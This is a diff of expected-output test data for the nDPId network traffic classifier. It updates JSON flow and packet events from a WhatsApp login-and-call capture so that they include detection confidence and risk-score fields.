 01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"}
-00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":138,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582227643,"flow_last_seen":1432582230649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":1604,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1432582230649,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"}
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01025{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"}
@@ -97,35 +97,35 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1432582238790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACarW0AAEARhl7AqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1432582238790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACat4MAAEARfEjAqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACayJAAAEARiRnAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaw2YAAEARjkPAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa2EoAAEARf1\/AqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa9a4AAEARYfvAqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa8J4AAEARUgvAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLVIAAEARFVjAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNZEAAEARBxnAqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
